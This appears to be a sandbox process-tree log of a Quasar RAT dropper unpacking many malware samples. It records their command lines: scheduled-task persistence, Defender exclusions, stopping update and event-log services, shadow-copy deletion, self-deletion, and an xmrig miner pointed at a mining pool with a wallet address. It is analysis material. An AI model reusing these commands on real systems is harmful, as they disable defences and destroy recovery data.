C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1260

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1388
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2696

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3020

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2900

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3368
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1132
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Quasar RAT
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3112
  - - C:\Users\Admin\Desktop\a\voidware_loader.exe
      "C:\Users\Admin\Desktop\a\voidware_loader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3352
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4012
    - - C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1096
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:412
  - - C:\Users\Admin\Desktop\a\build.exe
      "C:\Users\Admin\Desktop\a\build.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3340
  - - C:\Users\Admin\Desktop\a\gem1.exe
      "C:\Users\Admin\Desktop\a\gem1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4656
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 152
        5⤵
        Program crash
        
        PID:4212
  - - C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe
      "C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"
      4⤵
      PID:1456
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7380
  - - C:\Users\Admin\Desktop\a\albt.exe
      "C:\Users\Admin\Desktop\a\albt.exe"
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
        5⤵
        
        PID:3992
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        5⤵
        
        PID:2720
    - - C:\Users\Public\Libraries\npratlsN.pif
        
        C:\Users\Public\Libraries\npratlsN.pif
        5⤵
        
        PID:7432
  - - C:\Users\Admin\Desktop\a\drop2.exe
      "C:\Users\Admin\Desktop\a\drop2.exe"
      4⤵
      PID:7912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7180
    - - C:\Windows\SYSTEM32\SCHTASKS.exe
        
        SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8444
    - - C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe
        5⤵
        
        PID:5696
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2436
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change monitor-timeout-ac 0
        6⤵
        Power Settings
        
        PID:8000
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
        6⤵
        Power Settings
        
        PID:7656
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setactive SCHEME_CURRENT
        6⤵
        Power Settings
        
        PID:7668
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:7392
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:1532
      - C:\Windows\System32\curl.exe
        
        curl -s https://api.ipify.org
        6⤵
        
        PID:4040
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:7412
      - C:\Windows\System32\curl.exe
        
        curl -s http://ipinfo.io/country
        6⤵
        
        PID:3316
      - C:\Windows\System32\svchost.exe
        
        "C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=30
        6⤵
        
        PID:8088
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        5⤵
        
        PID:7864
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        5⤵
        
        PID:1996
  - - C:\Users\Admin\Desktop\a\drop1.exe
      "C:\Users\Admin\Desktop\a\drop1.exe"
      4⤵
      PID:3532
    - - C:\Users\Admin\Desktop\a\drop1.exe
        
        "C:\Users\Admin\Desktop\a\drop1.exe"
        5⤵
        
        PID:5876
  - - C:\Users\Admin\Desktop\a\01.exe
      "C:\Users\Admin\Desktop\a\01.exe"
      4⤵
      PID:7284
    - - C:\Users\Admin\Desktop\a\._cache_01.exe
        
        "C:\Users\Admin\Desktop\a\._cache_01.exe"
        5⤵
        
        PID:7816
      - C:\Users\Admin\Desktop\a\a\gem2.exe
        
        "C:\Users\Admin\Desktop\a\a\gem2.exe"
        6⤵
        
        PID:3744
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:9124
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:3932
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:9156
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:6080
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:8440
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:7008
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:5764
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:2320
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        
        PID:7080
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:5440
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        
        PID:6604
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        7⤵
        
        PID:4652
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:8164
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GeekBrains"
        7⤵
        Launches sc.exe
        
        PID:712
  - - C:\Users\Admin\Desktop\a\wudi.exe
      "C:\Users\Admin\Desktop\a\wudi.exe"
      4⤵
      PID:7304
  - - C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe
      "C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"
      4⤵
      PID:2180
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"
      4⤵
      PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\is-OU8OS.tmp\Kerish_Doctor_2023.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OU8OS.tmp\Kerish_Doctor_2023.tmp" /SL5="$8033E,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"
        5⤵
        
        PID:6016
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Users\Admin\Desktop\._cache_Synaptics.exe
      "C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:652
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3956
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3988
  - - C:\Users\Admin\Desktop\a\gem2.exe
      "C:\Users\Admin\Desktop\a\gem2.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:5128
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2076
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5456
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3748
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5472
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:5524
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:5564
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:5612
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5616
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5664
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:2552
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5660
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GeekBrains"
        5⤵
        Launches sc.exe
        
        PID:5736
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:5296
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1484
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GeekBrains"
        5⤵
        Launches sc.exe
        
        PID:5340
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4368
  - - C:\Users\Admin\Desktop\a\Steanings.exe
      "C:\Users\Admin\Desktop\a\Steanings.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6552
  - - C:\Users\Admin\Desktop\a\uu.exe
      "C:\Users\Admin\Desktop\a\uu.exe"
      4⤵
      PID:5828
  - - C:\Users\Admin\Desktop\a\32.exe
      "C:\Users\Admin\Desktop\a\32.exe"
      4⤵
      PID:2320
    - - C:\Users\Admin\Desktop\a\._cache_32.exe
        
        "C:\Users\Admin\Desktop\a\._cache_32.exe"
        5⤵
        
        PID:3084
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:764
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3432
  - - C:\Users\Admin\Desktop\a\voidware_loader.exe
      "C:\Users\Admin\Desktop\a\voidware_loader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2860
  - - C:\Users\Admin\Desktop\a\cbot.exe
      "C:\Users\Admin\Desktop\a\cbot.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      PID:5160
  - - C:\Users\Admin\Desktop\a\Client.exe
      "C:\Users\Admin\Desktop\a\Client.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6872
  - - C:\Users\Admin\Desktop\a\svhost.exe
      "C:\Users\Admin\Desktop\a\svhost.exe"
      4⤵
      Executes dropped EXE
      PID:5128
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6920
  - - C:\Users\Admin\Desktop\a\mimikatz.exe
      "C:\Users\Admin\Desktop\a\mimikatz.exe"
      4⤵
      Executes dropped EXE
      PID:5296
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1712
  - - C:\Users\Admin\Desktop\a\123.exe
      "C:\Users\Admin\Desktop\a\123.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6296
  - - C:\Users\Admin\Desktop\a\xmrig.exe
      "C:\Users\Admin\Desktop\a\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:6800
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6628
  - - C:\Users\Admin\Desktop\a\chrtrome22.exe
      "C:\Users\Admin\Desktop\a\chrtrome22.exe"
      4⤵
      Executes dropped EXE
      PID:5636
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1492
    - - C:\xmrig\xmrig-6.22.2\xmrig.exe
        
        "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
        5⤵
        
        PID:2176
  - - C:\Users\Admin\Desktop\a\Fixer.exe
      "C:\Users\Admin\Desktop\a\Fixer.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6600
  - - C:\Users\Admin\Desktop\a\Client-built.exe
      "C:\Users\Admin\Desktop\a\Client-built.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5660
  - - C:\Users\Admin\Desktop\a\AsyncClientGK.exe
      "C:\Users\Admin\Desktop\a\AsyncClientGK.exe"
      4⤵
      PID:1784
  - - C:\Users\Admin\Desktop\a\RuntimeBroker.exe
      "C:\Users\Admin\Desktop\a\RuntimeBroker.exe"
      4⤵
      PID:6164
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5140
    - - C:\Windows\system32\a7\RuntimeBroker.exe
        
        "C:\Windows\system32\a7\RuntimeBroker.exe"
        5⤵
        
        PID:3360
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2200
  - - C:\Users\Admin\Desktop\a\Crawl.exe
      "C:\Users\Admin\Desktop\a\Crawl.exe"
      4⤵
      PID:7088
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\nwVGkh\nwVG\..\..\Windows\nwVG\nwVG\..\..\system32\nwVG\nwVG\..\..\wbem\nwVG\nwVGk\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:2488
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\YksnBZ\Yksn\..\..\Windows\Yksn\Yksn\..\..\system32\Yksn\Yksn\..\..\wbem\Yksn\YksnB\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:7228
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5344
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8160
  - - C:\Users\Admin\Desktop\a\sela.exe
      "C:\Users\Admin\Desktop\a\sela.exe"
      4⤵
      PID:644
    - - C:\Users\Admin\Desktop\a\._cache_sela.exe
        
        "C:\Users\Admin\Desktop\a\._cache_sela.exe"
        5⤵
        
        PID:4916
      - C:\Users\Admin\Desktop\a\a\voidware_loader.exe
        
        "C:\Users\Admin\Desktop\a\a\voidware_loader.exe"
        6⤵
        
        PID:1140
      - C:\Users\Admin\Desktop\a\a\build.exe
        
        "C:\Users\Admin\Desktop\a\a\build.exe"
        6⤵
        
        PID:7856
      - C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        6⤵
        
        PID:7416
        
        C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        7⤵
        
        PID:4880
        
        C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        7⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 164
        7⤵
        Program crash
        
        PID:1992
  - - C:\Users\Admin\Desktop\a\64.exe
      "C:\Users\Admin\Desktop\a\64.exe"
      4⤵
      PID:3560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color 0a
        5⤵
        
        PID:4600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp 936
        5⤵
        
        PID:5488
      - C:\Windows\system32\chcp.com
        
        chcp 936
        6⤵
        
        PID:6060
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"
      4⤵
      PID:8576
    - - C:\Users\Admin\AppData\Local\Temp\is-EBH1O.tmp\Kerish_Doctor_2022.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EBH1O.tmp\Kerish_Doctor_2022.tmp" /SL5="$703EA,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"
        5⤵
        
        PID:8424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa1afbcc40,0x7ffa1afbcc4c,0x7ffa1afbcc58
    3⤵
    PID:2800
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:2
    3⤵
    PID:3196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,12438488159283466924,14357079867156274127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
    3⤵
    PID:4796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
